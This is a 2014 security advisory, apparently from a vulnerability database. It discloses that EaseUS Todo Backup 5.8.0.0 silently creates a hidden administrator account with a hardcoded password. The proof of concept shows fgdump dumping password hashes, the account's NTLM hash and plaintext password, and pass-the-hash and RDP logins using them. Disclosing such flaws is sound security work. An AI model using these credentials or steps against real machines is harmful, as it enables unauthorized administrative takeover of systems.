EaseUS Todo Backup 5.8.0.0 Hardcoded Password

2014.03.21
Credit: AkaStep
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

Vulnerable Software: ======================================== EaseUS Todo Backup 5.8.0.0 (build 20130321) http://oi62.tinypic.com/108i4ut.jpg ======================================== Vuln: Hardcoded Administrative Password./Potential backdoor. ======================================== Impact: An attacker exploiting this vulnerability could assume greater privileges on a compromised system, allowing them to potentially destroy data or take control of computers for malicious purposes. ======================================== About software: Designed for small and medium-sized businesses. Simplify backup & recovery management to minimize server downtime and ensure business continuity ======================================== Vuln details: EaseUS Todo Backup 5.8.0.0 (build 20130321) (other versions may also suffer from this but not tested) when installing it on your machine creates hidden Administrative local account on your machine with hardcoded/broken password. But this can be abused by remote attackers as well. Using this administrative account remote/local attacker may completely compromise target machine. Here is few Proof of concept demonstrations: *Before installation ("net user" command on target machine)* C:\Users\Administrator>NET USER User accounts for \\WIN-CE1QUVOKT1H --------------------------------------------------------------------------- Administrator Guest The command completed successfully. *After installation complete: (Notice: we've got new local administrative account in silent manner!)* C:\Users\Administrator>NET USER User accounts for \\WIN-CE1QUVOKT1H --------------------------------------------------------------------------- Administrator ETB User Guest The command completed successfully. C:\Users\Administrator>NET USER User accounts for \\WIN-CE1QUVOKT1H --------------------------------------------------------------------------- Administrator ETB User Guest The command completed successfully. C:\Users\Administrator>control userpasswords2 C:\Users\Administrator>cd Desktop C:\Users\Administrator\Desktop>fgdump.exe fgDump 2.1.0 - fizzgig and the mighty group at foofus.net Written to make j0m0kun's life just a bit easier Copyright(C) 2008 fizzgig and foofus.net fgdump comes with ABSOLUTELY NO WARRANTY! This is free software, and you are welcome to redistribute it under certain conditions; see the COPYING and README files for more information. No parameters specified, doing a local dump. Specify -? if you are looking elp. --- Session ID: 2014-03-22-05-13-53 --- Starting dump on 127.0.0.1 ** Beginning local dump ** OS (127.0.0.1): Microsoft Windows Unknown Server (Build 9600) (64-bit) Passwords dumped successfully Cache dumped successfully -----Summary----- Failed servers: NONE Successful servers: 127.0.0.1 Total failed: 0 Total successful: 1 C:\Users\Administrator\Desktop>net user User accounts for \\WIN-CE1QUVOKT1H --------------------------------------------------------------------------- Administrator ETB User Guest The command completed successfully. C:\Users\Administrator\Desktop>net user "ETB User" User name ETB User Full Name ETB User Comment For EaseUS Todo Backup Central Management Cons User's comment Country/region code 000 (System Default) Account active Yes Account expires Never Password last set 3/21/2014 10:12:52 PM Password expires Never Password changeable 3/21/2014 10:12:52 PM Password required Yes User may change password Yes Workstations allowed All Logon script User profile Home directory Last logon Never Logon hours allowed All Local Group Memberships *Administrators Global Group memberships *None The command completed successfully. C:\Users\Administrator\Desktop> C:\Users\Administrator\Desktop>type 127.0.0.1.pwdump ---------- SNIP ---------------- ETB User:1001:NO PASSWORD*********************:DE0F2B9AAEDF6BF59FED68AB06C334C2: ---------- SNIP ---------------- This hardcoded administive password filtrates in wild: Pass: ~1EaseUs@AcsT http://forum.insidepro.com/viewtopic.php?t=8677&start=420&sid=ed953995a5aa360b9c5be3f1472328d6 Trying to logon to this account: Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami win-ce1quvokt1h\etb user C:\Windows\system32>whoami /all USER INFORMATION ---------------- User Name SID ======================== ============================================= win-ce1quvokt1h\etb user S-1-5-21-140604893-3061859077-1642753036-1001 GROUP INFORMATION ----------------- Group Name Type S ID Attributes ============================================================= ================ = =========== ================================================== Everyone Well-known group S -1-1-0 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\Local account and member of Administrators group Well-known group S -1-5-114 Group used for deny only BUILTIN\Administrators Alias S -1-5-32-544 Group used for deny only BUILTIN\Users Alias S -1-5-32-545 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\INTERACTIVE Well-known group S -1-5-4 Mandatory group, Enabled by default, Enabled group CONSOLE LOGON Well-known group S -1-2-1 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\Authenticated Users Well-known group S -1-5-11 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\This Organization Well-known group S -1-5-15 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\Local account Well-known group S -1-5-113 Mandatory group, Enabled by default, Enabled group LOCAL Well-known group S -1-2-0 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\NTLM Authentication Well-known group S -1-5-64-10 Mandatory group, Enabled by default, Enabled group Mandatory Label\Medium Mandatory Level Label S -1-16-8192 PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ==================================== ======== SeShutdownPrivilege Shut down the system Disabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeUndockPrivilege Remove computer from docking station Disabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled SeTimeZonePrivilege Change the time zone Disabled C:\Windows\system32>exit Testing for lovely Pass The Hash technique: Result is successfull against Server 2012 R2 [blackhat@localhost FreeRDP]$ xfreerdp -u "ETB User" -p DE0F2B9AAEDF6BF59FED68AB06C334C2 192.168.1.103 WARNING: Using deprecated command-line interface! -p ****** -> /p:****** -u ETB User -> /u:ETB User 192.168.1.103 -> /v:192.168.1.103 connected to 192.168.1.103:3389 Closed from X11 PIC 1: http://oi58.tinypic.com/2z8b7t4.jpg Or using valid and hardcoded+known credentials: [blackhat@localhost ~]$ rdesktop -u "ETB User" -p ~1EaseUs@AcsT 192.168.1.103 Autoselected keyboard map en-us Connection established using SSL. WARNING: Remote desktop does not support colour depth 24; falling back to 16 PIC 2: http://oi60.tinypic.com/2j459pk.jpg ===================== WITH LOVE FROM AZERBAIJAN ======================== packetstormsecurity.org packetstormsecurity.com packetstormsecurity.net securityfocus.com cxsecurity.com security.nnov.ru securtiyvulns.com securitylab.ru secunia.com securityhome.eu exploitsdownload.com osvdb.com websecurity.com.ua 1337day.com itsecuritysolutions.org waraxe.us exploit-db.com insecurety.net millikuvvetler.net b3yaz.org Special respect's to CAMOUFL4G3 && ottoman38 and to all Azerbaijan Black hatz,Aa team && to All Turkish hackers. /AkaStep

References:

http://oi62.tinypic.com/108i4ut.jpg
http://oi58.tinypic.com/2z8b7t4.jpg


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top